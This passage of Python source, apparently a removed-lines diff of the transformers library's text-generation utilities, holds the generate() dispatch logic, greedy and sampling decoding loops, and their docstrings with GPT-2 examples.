See `attentions` under - returned tensors for more details. - output_hidden_states (`bool`, *optional*, defaults to `False`): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more details. - output_scores (`bool`, *optional*, defaults to `False`): - Whether or not to return the prediction scores. See `scores` under returned tensors for more details. - return_dict_in_generate (`bool`, *optional*, defaults to `False`): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. - forced_bos_token_id (`int`, *optional*): - The id of the token to force as the first generated token after the `decoder_start_token_id`. Useful - for multilingual models like [mBART](../model_doc/mbart) where the first generated token needs to be - the target language token. - forced_eos_token_id (`int`, *optional*): - The id of the token to force as the last generated token when `max_length` is reached. - remove_invalid_values (`bool`, *optional*): - Whether to remove possible *nan* and *inf* outputs of the model to prevent the generation method to - crash. Note that using `remove_invalid_values` can slow down generation. - synced_gpus (`bool`, *optional*, defaults to `False`): - Whether to continue running the while loop until max_length (needed for ZeRO stage 3) - exponential_decay_length_penalty (`tuple(int, float)`, *optional*): - This Tuple adds an exponentially increasing length penalty, after a certain amount of tokens have been - generated. The tuple shall consist of: `(start_index, decay_factor)` where `start_index` indicates - where penalty starts and `decay_factor` represents the factor of exponential decay - - model_kwargs: - Additional model specific kwargs will be forwarded to the `forward` function of the model. If the model - is an encoder-decoder model, encoder specific kwargs should not be prefixed and decoder specific kwargs - should be prefixed with *decoder_*. - - Return: - [`~utils.ModelOutput`] or `torch.LongTensor`: A [`~utils.ModelOutput`] (if `return_dict_in_generate=True` - or when `config.return_dict_in_generate=True`) or a `torch.FloatTensor`. 
- - If the model is *not* an encoder-decoder model (`model.config.is_encoder_decoder=False`), the possible - [`~utils.ModelOutput`] types are: - - - [`~generation_utils.GreedySearchDecoderOnlyOutput`], - - [`~generation_utils.SampleDecoderOnlyOutput`], - - [`~generation_utils.BeamSearchDecoderOnlyOutput`], - - [`~generation_utils.BeamSampleDecoderOnlyOutput`] - - If the model is an encoder-decoder model (`model.config.is_encoder_decoder=True`), the possible - [`~utils.ModelOutput`] types are: - - - [`~generation_utils.GreedySearchEncoderDecoderOutput`], - - [`~generation_utils.SampleEncoderDecoderOutput`], - - [`~generation_utils.BeamSearchEncoderDecoderOutput`], - - [`~generation_utils.BeamSampleEncoderDecoderOutput`] - - Examples: - - Greedy Decoding: - - ```python - >>> from transformers import AutoTokenizer, AutoModelForCausalLM - - >>> tokenizer = AutoTokenizer.from_pretrained("gpt2") - >>> model = AutoModelForCausalLM.from_pretrained("gpt2") - - >>> prompt = "Today I believe we can finally" - >>> input_ids = tokenizer(prompt, return_tensors="pt").input_ids - - >>> # generate up to 30 tokens - >>> outputs = model.generate(input_ids, do_sample=False, max_length=30) - >>> tokenizer.batch_decode(outputs, skip_special_tokens=True) - ['Today I believe we can finally get to the point where we can make a difference in the lives of the people of the United States of America.\n'] - ``` - - Multinomial Sampling: - - ```python - >>> from transformers import AutoTokenizer, AutoModelForCausalLM - >>> import torch - - >>> tokenizer = AutoTokenizer.from_pretrained("gpt2") - >>> model = AutoModelForCausalLM.from_pretrained("gpt2") - - >>> prompt = "Today I believe we can finally" - >>> input_ids = tokenizer(prompt, return_tensors="pt").input_ids - - >>> # sample up to 30 tokens - >>> torch.manual_seed(0) # doctest: +IGNORE_RESULT - >>> outputs = model.generate(input_ids, do_sample=True, max_length=30) - >>> tokenizer.batch_decode(outputs, skip_special_tokens=True) - ['Today I believe we can finally get rid of discrimination," said Rep. Mark Pocan (D-Wis.).\n\n"Just look at the'] - ``` - - Beam-search decoding: - - ```python - >>> from transformers import AutoTokenizer, AutoModelForSeq2SeqLM - - >>> tokenizer = AutoTokenizer.from_pretrained("Helsinki-NLP/opus-mt-en-de") - >>> model = AutoModelForSeq2SeqLM.from_pretrained("Helsinki-NLP/opus-mt-en-de") - - >>> sentence = "Paris is one of the densest populated areas in Europe." - >>> input_ids = tokenizer(sentence, return_tensors="pt").input_ids - - >>> outputs = model.generate(input_ids) - >>> tokenizer.batch_decode(outputs, skip_special_tokens=True) - ['Paris ist eines der dichtesten besiedelten Gebiete Europas.'] - ```""" - # 1. 
Set generation parameters if not already defined - bos_token_id = bos_token_id if bos_token_id is not None else self.config.bos_token_id - num_beams = num_beams if num_beams is not None else self.config.num_beams - length_penalty = length_penalty if length_penalty is not None else self.config.length_penalty - early_stopping = early_stopping if early_stopping is not None else self.config.early_stopping - num_beam_groups = num_beam_groups if num_beam_groups is not None else self.config.num_beam_groups - do_sample = do_sample if do_sample is not None else self.config.do_sample - num_return_sequences = ( - num_return_sequences if num_return_sequences is not None else self.config.num_return_sequences - ) - - pad_token_id = pad_token_id if pad_token_id is not None else self.config.pad_token_id - eos_token_id = eos_token_id if eos_token_id is not None else self.config.eos_token_id - - if eos_token_id is None and hasattr(self.config, "decoder"): - eos_token_id = self.config.decoder.eos_token_id - - if pad_token_id is None and eos_token_id is not None: - # special case if pad_token_id is not defined - print(f"Setting `pad_token_id` to `eos_token_id`:{eos_token_id} for open-end generation.") - pad_token_id = eos_token_id - - output_scores = output_scores if output_scores is not None else self.config.output_scores - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - return_dict_in_generate = ( - return_dict_in_generate if return_dict_in_generate is not None else self.config.return_dict_in_generate - ) - - # 2. Define model inputs - # inputs_tensor has to be defined - # model_input_name is defined if model-specific keyword input is passed - # otherwise model_input_name is None - # all model-specific keyword inputs are removed from `model_kwargs` - inputs_tensor, model_input_name, model_kwargs = self._prepare_model_inputs(inputs, bos_token_id, model_kwargs) - batch_size = inputs_tensor.shape[0] - - # 3. Define other model kwargs - model_kwargs["output_attentions"] = output_attentions - model_kwargs["output_hidden_states"] = output_hidden_states - model_kwargs["use_cache"] = use_cache - - accepts_attention_mask = "attention_mask" in set(inspect.signature(self.forward).parameters.keys()) - requires_attention_mask = "encoder_outputs" not in model_kwargs - - if model_kwargs.get("attention_mask", None) is None and requires_attention_mask and accepts_attention_mask: - model_kwargs["attention_mask"] = self._prepare_attention_mask_for_generation( - inputs_tensor, pad_token_id, eos_token_id - ) - - if self.config.is_encoder_decoder and "encoder_outputs" not in model_kwargs: - # if model is encoder decoder encoder_outputs are created - # and added to `model_kwargs` - model_kwargs = self._prepare_encoder_decoder_kwargs_for_generation( - inputs_tensor, model_kwargs, model_input_name - ) - - # 4. Prepare `input_ids` which will be used for auto-regressive generation - if self.config.is_encoder_decoder: - input_ids = self._prepare_decoder_input_ids_for_generation( - batch_size, - decoder_start_token_id=decoder_start_token_id, - bos_token_id=bos_token_id, - model_kwargs=model_kwargs, - device=inputs_tensor.device, - ) - else: - # if decoder-only then inputs_tensor has to be `input_ids` - input_ids = inputs_tensor - - input_ids_seq_length = input_ids.shape[-1] - - # 5. 
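-        # Illustrative arithmetic for the step below (hypothetical numbers): a 12-token prompt
-        # combined with max_new_tokens=30 gives max_length = 30 + 12 = 42, i.e. the budget for
-        # newly generated tokens is counted on top of the prompt length.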
Prepare `max_length` depending on other stopping criteria - # if `max_new_tokens` is passed, but not `max_length` -> set `max_length = max_new_tokens` - if max_length is None and max_new_tokens is not None: - max_length = max_new_tokens + input_ids_seq_length - elif max_length is not None and max_new_tokens is not None: - # Both are set, this is odd, raise a warning - warnings.warn( - "Both `max_length` and `max_new_tokens` have been set " - f"but they serve the same purpose. `max_length` {max_length} " - f"will take priority over `max_new_tokens` {max_new_tokens}.", - UserWarning, - ) - # default to config if still None - max_length = max_length if max_length is not None else self.config.max_length - min_length = min_length if min_length is not None else self.config.min_length - - if min_length is not None and min_length > max_length: - raise ValueError( - f"Unfeasable length constraints: the minimum length ({min_length}) is larger than the maximum " - f"length ({max_length})" - ) - if input_ids_seq_length >= max_length: - input_ids_string = "decoder_input_ids" if self.config.is_encoder_decoder else "input_ids" - print( - f"Input length of {input_ids_string} is {input_ids_seq_length}, but ``max_length`` is set to {max_length}. " - "This can lead to unexpected behavior. You should consider increasing ``config.max_length`` or ``max_length``." - ) - - # 6. determine generation mode - is_constraint_gen_mode = constraints is not None or force_words_ids is not None - is_greedy_gen_mode = ( - (num_beams == 1) and (num_beam_groups == 1) and do_sample is False and not is_constraint_gen_mode - ) - is_sample_gen_mode = ( - (num_beams == 1) and (num_beam_groups == 1) and do_sample is True and not is_constraint_gen_mode - ) - is_beam_gen_mode = ( - (num_beams > 1) and (num_beam_groups == 1) and do_sample is False and not is_constraint_gen_mode - ) - is_beam_sample_gen_mode = ( - (num_beams > 1) and (num_beam_groups == 1) and do_sample is True and not is_constraint_gen_mode - ) - is_group_beam_gen_mode = (num_beams > 1) and (num_beam_groups > 1) and not is_constraint_gen_mode - - if num_beam_groups > num_beams: - raise ValueError("`num_beam_groups` has to be smaller or equal to `num_beams`") - if is_group_beam_gen_mode and do_sample is True: - raise ValueError( - "Diverse beam search cannot be used in sampling mode. Make sure that `do_sample` is set to `False`." - ) - - # 7. prepare distribution pre_processing samplers - logits_processor = self._get_logits_processor( - repetition_penalty=repetition_penalty, - no_repeat_ngram_size=no_repeat_ngram_size, - encoder_no_repeat_ngram_size=encoder_no_repeat_ngram_size, - input_ids_seq_length=input_ids_seq_length, - encoder_input_ids=inputs_tensor, - bad_words_ids=bad_words_ids, - min_length=min_length, - max_length=max_length, - eos_token_id=eos_token_id, - forced_bos_token_id=forced_bos_token_id, - forced_eos_token_id=forced_eos_token_id, - prefix_allowed_tokens_fn=prefix_allowed_tokens_fn, - num_beams=num_beams, - num_beam_groups=num_beam_groups, - diversity_penalty=diversity_penalty, - remove_invalid_values=remove_invalid_values, - exponential_decay_length_penalty=exponential_decay_length_penalty, - logits_processor=logits_processor, - renormalize_logits=renormalize_logits, - ) - - # 8. prepare stopping criteria - stopping_criteria = self._get_stopping_criteria( - max_length=max_length, max_time=max_time, stopping_criteria=stopping_criteria - ) - - # 9. 
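-        # Summary of how the mode flags computed in step 6 map onto decoding strategies
-        # (a reading aid, not exhaustive):
-        #   num_beams == 1, do_sample False, no constraints        -> greedy_search
-        #   num_beams == 1, do_sample True,  no constraints        -> sample
-        #   num_beams > 1,  do_sample False, num_beam_groups == 1  -> beam_search
-        #   num_beams > 1,  do_sample True,  num_beam_groups == 1  -> beam_sample
-        #   num_beams > 1,  num_beam_groups > 1                    -> group_beam_search
-        #   constraints or force_words_ids given                   -> constrained_beam_search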
go into different generation modes - if is_greedy_gen_mode: - if num_return_sequences > 1: - raise ValueError( - f"num_return_sequences has to be 1, but is {num_return_sequences} when doing greedy search." - ) - - # 10. run greedy search - return self.greedy_search( - input_ids, - logits_processor=logits_processor, - stopping_criteria=stopping_criteria, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - output_scores=output_scores, - return_dict_in_generate=return_dict_in_generate, - synced_gpus=synced_gpus, - **model_kwargs, - ) - - elif is_sample_gen_mode: - # 10. prepare logits warper - logits_warper = self._get_logits_warper( - top_k=top_k, - top_p=top_p, - typical_p=typical_p, - temperature=temperature, - num_beams=num_beams, - renormalize_logits=renormalize_logits, - ) - - # 11. expand input_ids with `num_return_sequences` additional sequences per batch - input_ids, model_kwargs = self._expand_inputs_for_generation( - input_ids, - expand_size=num_return_sequences, - is_encoder_decoder=self.config.is_encoder_decoder, - **model_kwargs, - ) - - # 12. run sample - return self.sample( - input_ids, - logits_processor=logits_processor, - logits_warper=logits_warper, - stopping_criteria=stopping_criteria, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - output_scores=output_scores, - return_dict_in_generate=return_dict_in_generate, - synced_gpus=synced_gpus, - **model_kwargs, - ) - - elif is_beam_gen_mode: - if num_return_sequences > num_beams: - raise ValueError("`num_return_sequences` has to be smaller or equal to `num_beams`.") - - if stopping_criteria.max_length is None: - raise ValueError("`max_length` needs to be a stopping_criteria for now.") - - # 10. prepare beam search scorer - beam_scorer = BeamSearchScorer( - batch_size=batch_size, - num_beams=num_beams, - device=inputs_tensor.device, - length_penalty=length_penalty, - do_early_stopping=early_stopping, - num_beam_hyps_to_keep=num_return_sequences, - ) - # 11. interleave input_ids with `num_beams` additional sequences per batch - input_ids, model_kwargs = self._expand_inputs_for_generation( - input_ids, expand_size=num_beams, is_encoder_decoder=self.config.is_encoder_decoder, **model_kwargs - ) - # 12. run beam search - return self.beam_search( - input_ids, - beam_scorer, - logits_processor=logits_processor, - stopping_criteria=stopping_criteria, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - output_scores=output_scores, - return_dict_in_generate=return_dict_in_generate, - synced_gpus=synced_gpus, - **model_kwargs, - ) - - elif is_beam_sample_gen_mode: - # 10. prepare logits warper - logits_warper = self._get_logits_warper( - top_k=top_k, - top_p=top_p, - typical_p=typical_p, - temperature=temperature, - num_beams=num_beams, - renormalize_logits=renormalize_logits, - ) - - if stopping_criteria.max_length is None: - raise ValueError("`max_length` needs to be a stopping_criteria for now.") - # 11. prepare beam search scorer - beam_scorer = BeamSearchScorer( - batch_size=batch_size * num_return_sequences, - num_beams=num_beams, - device=inputs_tensor.device, - length_penalty=length_penalty, - do_early_stopping=early_stopping, - ) - - # 12. interleave input_ids with `num_beams` additional sequences per batch - input_ids, model_kwargs = self._expand_inputs_for_generation( - input_ids, - expand_size=num_beams * num_return_sequences, - is_encoder_decoder=self.config.is_encoder_decoder, - **model_kwargs, - ) - - # 13. 
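-            # Worked example of the expansion above (hypothetical sizes): with batch_size=2,
-            # num_beams=3 and num_return_sequences=2, the scorer tracks 2 * 2 = 4 hypothesis
-            # groups and every input row is repeated 3 * 2 = 6 times, so 12 rows are scored at
-            # each decoding step.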
run beam sample - return self.beam_sample( - input_ids, - beam_scorer, - logits_processor=logits_processor, - logits_warper=logits_warper, - stopping_criteria=stopping_criteria, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - output_scores=output_scores, - return_dict_in_generate=return_dict_in_generate, - synced_gpus=synced_gpus, - **model_kwargs, - ) - - elif is_group_beam_gen_mode: - if num_return_sequences > num_beams: - raise ValueError("`num_return_sequences` has to be smaller or equal to `num_beams`.") - - if num_beams % num_beam_groups != 0: - raise ValueError("`num_beams` should be divisible by `num_beam_groups` for group beam search.") - - if stopping_criteria.max_length is None: - raise ValueError("`max_length` needs to be a stopping_criteria for now.") - - # 10. prepare beam search scorer - beam_scorer = BeamSearchScorer( - batch_size=batch_size, - num_beams=num_beams, - max_length=stopping_criteria.max_length, - device=inputs_tensor.device, - length_penalty=length_penalty, - do_early_stopping=early_stopping, - num_beam_hyps_to_keep=num_return_sequences, - num_beam_groups=num_beam_groups, - ) - # 11. interleave input_ids with `num_beams` additional sequences per batch - input_ids, model_kwargs = self._expand_inputs_for_generation( - input_ids, expand_size=num_beams, is_encoder_decoder=self.config.is_encoder_decoder, **model_kwargs - ) - # 12. run beam search - return self.group_beam_search( - input_ids, - beam_scorer, - logits_processor=logits_processor, - stopping_criteria=stopping_criteria, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - output_scores=output_scores, - return_dict_in_generate=return_dict_in_generate, - synced_gpus=synced_gpus, - **model_kwargs, - ) - - elif is_constraint_gen_mode: - if num_return_sequences > num_beams: - raise ValueError("`num_return_sequences` has to be smaller or equal to `num_beams`.") - - if stopping_criteria.max_length is None: - raise ValueError("`max_length` needs to be a stopping_criteria for now.") - - if num_beams <= 1: - raise ValueError("`num_beams` needs to be greater than 1 for constrained genertation.") - - if do_sample: - raise ValueError("`do_sample` needs to be false for constrained generation.") - - if num_beam_groups is not None and num_beam_groups > 1: - raise ValueError("`num_beam_groups` not supported yet for constrained generation.") - - final_constraints = [] - if constraints is not None: - final_constraints = constraints - - if force_words_ids is not None: - - def typeerror(): - raise ValueError( - "`force_words_ids` has to either be a `List[List[List[int]]]` or `List[List[int]]`" - f"of positive integers, but is {force_words_ids}." - ) - - if not isinstance(force_words_ids, list) or len(force_words_ids) == 0: - typeerror() - - for word_ids in force_words_ids: - if isinstance(word_ids[0], list): - if not isinstance(word_ids, list) or len(word_ids) == 0: - typeerror() - if any(not isinstance(token_ids, list) for token_ids in word_ids): - typeerror() - if any( - any((not isinstance(token_id, int) or token_id < 0) for token_id in token_ids) - for token_ids in word_ids - ): - typeerror() - - constraint = DisjunctiveConstraint(word_ids) - else: - if not isinstance(word_ids, list) or len(word_ids) == 0: - typeerror() - if any((not isinstance(token_id, int) or token_id < 0) for token_id in word_ids): - typeerror() - - constraint = PhrasalConstraint(word_ids) - final_constraints.append(constraint) - - # 10. 
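-            # Illustrative shapes for `force_words_ids` (hypothetical token ids):
-            #   [[42, 7], [99]]        -> two PhrasalConstraints: both phrases must appear
-            #   [[[42, 7], [43, 7]]]   -> one DisjunctiveConstraint: either variant must appear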
prepare beam search scorer - constrained_beam_scorer = ConstrainedBeamSearchScorer( - constraints=final_constraints, - batch_size=batch_size, - num_beams=num_beams, - device=inputs_tensor.device, - length_penalty=length_penalty, - do_early_stopping=early_stopping, - num_beam_hyps_to_keep=num_return_sequences, - ) - # 11. interleave input_ids with `num_beams` additional sequences per batch - input_ids, model_kwargs = self._expand_inputs_for_generation( - input_ids, expand_size=num_beams, is_encoder_decoder=self.config.is_encoder_decoder, **model_kwargs - ) - # 12. run beam search - return self.constrained_beam_search( - input_ids, - constrained_beam_scorer=constrained_beam_scorer, - logits_processor=logits_processor, - stopping_criteria=stopping_criteria, - pad_token_id=pad_token_id, - eos_token_id=eos_token_id, - output_scores=output_scores, - return_dict_in_generate=return_dict_in_generate, - synced_gpus=synced_gpus, - **model_kwargs, - ) - - def greedy_search( - self, - input_ids: torch.LongTensor, - logits_processor: Optional[LogitsProcessorList] = None, - stopping_criteria: Optional[StoppingCriteriaList] = None, - max_length: Optional[int] = None, - pad_token_id: Optional[int] = None, - eos_token_id: Optional[int] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - output_scores: Optional[bool] = None, - return_dict_in_generate: Optional[bool] = None, - synced_gpus: Optional[bool] = False, - **model_kwargs, - ) -> Union[GreedySearchOutput, torch.LongTensor]: - r""" - Generates sequences of token ids for models with a language modeling head using **greedy decoding** and can be - used for text-decoder, text-to-text, speech-to-text, and vision-to-text models. - - Parameters: - - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - The sequence used as a prompt for the generation. - logits_processor (`LogitsProcessorList`, *optional*): - An instance of [`LogitsProcessorList`]. List of instances of class derived from [`LogitsProcessor`] - used to modify the prediction scores of the language modeling head applied at each generation step. - stopping_criteria (`StoppingCriteriaList`, *optional*): - An instance of [`StoppingCriteriaList`]. List of instances of class derived from [`StoppingCriteria`] - used to tell if the generation loop should stop. - - max_length (`int`, *optional*, defaults to 20): - **DEPRECATED**. Use `logits_processor` or `stopping_criteria` directly to cap the number of generated - tokens. The maximum length of the sequence to be generated. - pad_token_id (`int`, *optional*): - The id of the *padding* token. - eos_token_id (`int`, *optional*): - The id of the *end-of-sequence* token. - output_attentions (`bool`, *optional*, defaults to `False`): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more details. - output_hidden_states (`bool`, *optional*, defaults to `False`): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more details. - output_scores (`bool`, *optional*, defaults to `False`): - Whether or not to return the prediction scores. See `scores` under returned tensors for more details. - return_dict_in_generate (`bool`, *optional*, defaults to `False`): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. 
- synced_gpus (`bool`, *optional*, defaults to `False`): - Whether to continue running the while loop until max_length (needed for ZeRO stage 3) - model_kwargs: - Additional model specific keyword arguments will be forwarded to the `forward` function of the model. - If model is an encoder-decoder model the kwargs should include `encoder_outputs`. - - Return: - [`~generation_utils.GreedySearchDecoderOnlyOutput`], [`~generation_utils.GreedySearchEncoderDecoderOutput`] - or `torch.LongTensor`: A `torch.LongTensor` containing the generated tokens (default behaviour) or a - [`~generation_utils.GreedySearchDecoderOnlyOutput`] if `model.config.is_encoder_decoder=False` and - `return_dict_in_generate=True` or a [`~generation_utils.GreedySearchEncoderDecoderOutput`] if - `model.config.is_encoder_decoder=True`. - - Examples: - - ```python - >>> from transformers import ( - ... AutoTokenizer, - ... AutoModelForCausalLM, - ... LogitsProcessorList, - ... MinLengthLogitsProcessor, - ... StoppingCriteriaList, - ... MaxLengthCriteria, - ... ) - - >>> tokenizer = AutoTokenizer.from_pretrained("gpt2") - >>> model = AutoModelForCausalLM.from_pretrained("gpt2") - - >>> # set pad_token_id to eos_token_id because GPT2 does not have a EOS token - >>> model.config.pad_token_id = model.config.eos_token_id - - >>> input_prompt = "It might be possible to" - >>> input_ids = tokenizer(input_prompt, return_tensors="pt").input_ids - - >>> # instantiate logits processors - >>> logits_processor = LogitsProcessorList( - ... [ - ... MinLengthLogitsProcessor(10, eos_token_id=model.config.eos_token_id), - ... ] - ... ) - >>> stopping_criteria = StoppingCriteriaList([MaxLengthCriteria(max_length=20)]) - - >>> outputs = model.greedy_search( - ... input_ids, logits_processor=logits_processor, stopping_criteria=stopping_criteria - ... 
) - - >>> tokenizer.batch_decode(outputs, skip_special_tokens=True) - ["It might be possible to get a better understanding of the nature of the problem, but it's not"] - ```""" - # init values - logits_processor = logits_processor if logits_processor is not None else LogitsProcessorList() - stopping_criteria = stopping_criteria if stopping_criteria is not None else StoppingCriteriaList() - if max_length is not None: - warnings.warn( - "`max_length` is deprecated in this function, use `stopping_criteria=StoppingCriteriaList([MaxLengthCriteria(max_length=max_length)])` instead.", - UserWarning, - ) - stopping_criteria = validate_stopping_criteria(stopping_criteria, max_length) - pad_token_id = pad_token_id if pad_token_id is not None else self.config.pad_token_id - eos_token_id = eos_token_id if eos_token_id is not None else self.config.eos_token_id - output_scores = output_scores if output_scores is not None else self.config.output_scores - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - return_dict_in_generate = ( - return_dict_in_generate if return_dict_in_generate is not None else self.config.return_dict_in_generate - ) - - # init attention / hidden states / scores tuples - scores = () if (return_dict_in_generate and output_scores) else None - decoder_attentions = () if (return_dict_in_generate and output_attentions) else None - cross_attentions = () if (return_dict_in_generate and output_attentions) else None - decoder_hidden_states = () if (return_dict_in_generate and output_hidden_states) else None - - # if model is an encoder-decoder, retrieve encoder attention weights and hidden states - if return_dict_in_generate and self.config.is_encoder_decoder: - encoder_attentions = model_kwargs["encoder_outputs"].get("attentions") if output_attentions else None - encoder_hidden_states = ( - model_kwargs["encoder_outputs"].get("hidden_states") if output_hidden_states else None - ) - - # keep track of which sequences are already finished - unfinished_sequences = input_ids.new(input_ids.shape[0]).fill_(1) - cur_len = input_ids.shape[-1] - - this_peer_finished = False # used by synced_gpus only - while True: - - if synced_gpus: - # Under synced_gpus the `forward` call must continue until all gpus complete their sequence. - # The following logic allows an early break if all peers finished generating their sequence - this_peer_finished_flag = torch.tensor(0.0 if this_peer_finished else 1.0).to(input_ids.device) - # send 0.0 if we finished, 1.0 otherwise - dist.all_reduce(this_peer_finished_flag, op=dist.ReduceOp.SUM) - # did all peers finish? 
the reduced sum will be 0.0 then - if this_peer_finished_flag.item() == 0.0: - break - - # prepare model inputs - model_inputs = self.prepare_inputs_for_generation(input_ids, **model_kwargs) - - # forward pass to get next token - outputs = self( - **model_inputs, - return_dict=True, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - ) - - if synced_gpus and this_peer_finished: - cur_len = cur_len + 1 - continue # don't waste resources running the code we don't need - - next_token_logits = outputs.logits[:, -1, :] - - # Store scores, attentions and hidden_states when required - if return_dict_in_generate: - if output_scores: - scores += (next_token_logits,) - if output_attentions: - decoder_attentions += ( - (outputs.decoder_attentions,) if self.config.is_encoder_decoder else (outputs.attentions,) - ) - if self.config.is_encoder_decoder: - cross_attentions += (outputs.cross_attentions,) - - if output_hidden_states: - decoder_hidden_states += ( - (outputs.decoder_hidden_states,) - if self.config.is_encoder_decoder - else (outputs.hidden_states,) - ) - - # pre-process distribution - next_tokens_scores = logits_processor(input_ids, next_token_logits) - - # argmax - next_tokens = torch.argmax(next_tokens_scores, dim=-1) - - # finished sentences should have their next token be a padding token - if eos_token_id is not None: - if pad_token_id is None: - raise ValueError("If `eos_token_id` is defined, make sure that `pad_token_id` is defined.") - next_tokens = next_tokens * unfinished_sequences + pad_token_id * (1 - unfinished_sequences) - - # update generated ids, model inputs, and length for next step - input_ids = torch.cat([input_ids, next_tokens[:, None]], dim=-1) - model_kwargs = self._update_model_kwargs_for_generation( - outputs, model_kwargs, is_encoder_decoder=self.config.is_encoder_decoder - ) - cur_len = cur_len + 1 - - # if eos_token was found in one sentence, set sentence to finished - if eos_token_id is not None: - unfinished_sequences = unfinished_sequences.mul((next_tokens != eos_token_id).long()) - - # stop when each sentence is finished, or if we exceed the maximum length - if unfinished_sequences.max() == 0 or stopping_criteria(input_ids, scores): - if not synced_gpus: - break - else: - this_peer_finished = True - - if return_dict_in_generate: - if self.config.is_encoder_decoder: - return GreedySearchEncoderDecoderOutput( - sequences=input_ids, - scores=scores, - encoder_attentions=encoder_attentions, - encoder_hidden_states=encoder_hidden_states, - decoder_attentions=decoder_attentions, - cross_attentions=cross_attentions, - decoder_hidden_states=decoder_hidden_states, - ) - else: - return GreedySearchDecoderOnlyOutput( - sequences=input_ids, - scores=scores, - attentions=decoder_attentions, - hidden_states=decoder_hidden_states, - ) - else: - return input_ids - - def sample( - self, - input_ids: torch.LongTensor, - logits_processor: Optional[LogitsProcessorList] = None, - stopping_criteria: Optional[StoppingCriteriaList] = None, - logits_warper: Optional[LogitsProcessorList] = None, - max_length: Optional[int] = None, - pad_token_id: Optional[int] = None, - eos_token_id: Optional[int] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - output_scores: Optional[bool] = None, - return_dict_in_generate: Optional[bool] = None, - synced_gpus: Optional[bool] = False, - **model_kwargs, - ) -> Union[SampleOutput, torch.LongTensor]: - r""" - Generates sequences of token ids for models with a language 
modeling head using **multinomial sampling** and - can be used for text-decoder, text-to-text, speech-to-text, and vision-to-text models. - - Parameters: - - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - The sequence used as a prompt for the generation. - logits_processor (`LogitsProcessorList`, *optional*): - An instance of [`LogitsProcessorList`]. List of instances of class derived from [`LogitsProcessor`] - used to modify the prediction scores of the language modeling head applied at each generation step. - stopping_criteria (`StoppingCriteriaList`, *optional*): - An instance of [`StoppingCriteriaList`]. List of instances of class derived from [`StoppingCriteria`] - used to tell if the generation loop should stop. - logits_warper (`LogitsProcessorList`, *optional*): - An instance of [`LogitsProcessorList`]. List of instances of class derived from [`LogitsWarper`] used - to warp the prediction score distribution of the language modeling head applied before multinomial - sampling at each generation step. - max_length (`int`, *optional*, defaults to 20): - **DEPRECATED**. Use `logits_processor` or `stopping_criteria` directly to cap the number of generated - tokens. The maximum length of the sequence to be generated. - pad_token_id (`int`, *optional*): - The id of the *padding* token. - eos_token_id (`int`, *optional*): - The id of the *end-of-sequence* token. - output_attentions (`bool`, *optional*, defaults to `False`): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more details. - output_hidden_states (`bool`, *optional*, defaults to `False`): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more details. - output_scores (`bool`, *optional*, defaults to `False`): - Whether or not to return the prediction scores. See `scores` under returned tensors for more details. - return_dict_in_generate (`bool`, *optional*, defaults to `False`): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. - synced_gpus (`bool`, *optional*, defaults to `False`): - Whether to continue running the while loop until max_length (needed for ZeRO stage 3) - model_kwargs: - Additional model specific kwargs will be forwarded to the `forward` function of the model. If model is - an encoder-decoder model the kwargs should include `encoder_outputs`. - - Return: - [`~generation_utils.SampleDecoderOnlyOutput`], [`~generation_utils.SampleEncoderDecoderOutput`] or - `torch.LongTensor`: A `torch.LongTensor` containing the generated tokens (default behaviour) or a - [`~generation_utils.SampleDecoderOnlyOutput`] if `model.config.is_encoder_decoder=False` and - `return_dict_in_generate=True` or a [`~generation_utils.SampleEncoderDecoderOutput`] if - `model.config.is_encoder_decoder=True`. - - Examples: - - ```python - >>> from transformers import ( - ... AutoTokenizer, - ... AutoModelForCausalLM, - ... LogitsProcessorList, - ... MinLengthLogitsProcessor, - ... TopKLogitsWarper, - ... TemperatureLogitsWarper, - ... StoppingCriteriaList, - ... MaxLengthCriteria, - ... 
) - >>> import torch - - >>> tokenizer = AutoTokenizer.from_pretrained("gpt2") - >>> model = AutoModelForCausalLM.from_pretrained("gpt2") - - >>> # set pad_token_id to eos_token_id because GPT2 does not have a EOS token - >>> model.config.pad_token_id = model.config.eos_token_id - - >>> input_prompt = "Today is a beautiful day, and" - >>> input_ids = tokenizer(input_prompt, return_tensors="pt").input_ids - - >>> # instantiate logits processors - >>> logits_processor = LogitsProcessorList( - ... [ - ... MinLengthLogitsProcessor(15, eos_token_id=model.config.eos_token_id), - ... ] - ... ) - >>> # instantiate logits processors - >>> logits_warper = LogitsProcessorList( - ... [ - ... TopKLogitsWarper(50), - ... TemperatureLogitsWarper(0.7), - ... ] - ... ) - - >>> stopping_criteria = StoppingCriteriaList([MaxLengthCriteria(max_length=20)]) - - >>> torch.manual_seed(0) # doctest: +IGNORE_RESULT - >>> outputs = model.sample( - ... input_ids, - ... logits_processor=logits_processor, - ... logits_warper=logits_warper, - ... stopping_criteria=stopping_criteria, - ... ) - - >>> tokenizer.batch_decode(outputs, skip_special_tokens=True) - ['Today is a beautiful day, and a wonderful day.\n\nI was lucky enough to meet the'] - ```""" - - # init values - logits_processor = logits_processor if logits_processor is not None else LogitsProcessorList() - stopping_criteria = stopping_criteria if stopping_criteria is not None else StoppingCriteriaList() - if max_length is not None: - warnings.warn( - "`max_length` is deprecated in this function, use `stopping_criteria=StoppingCriteriaList(MaxLengthCriteria(max_length=max_length))` instead.", - 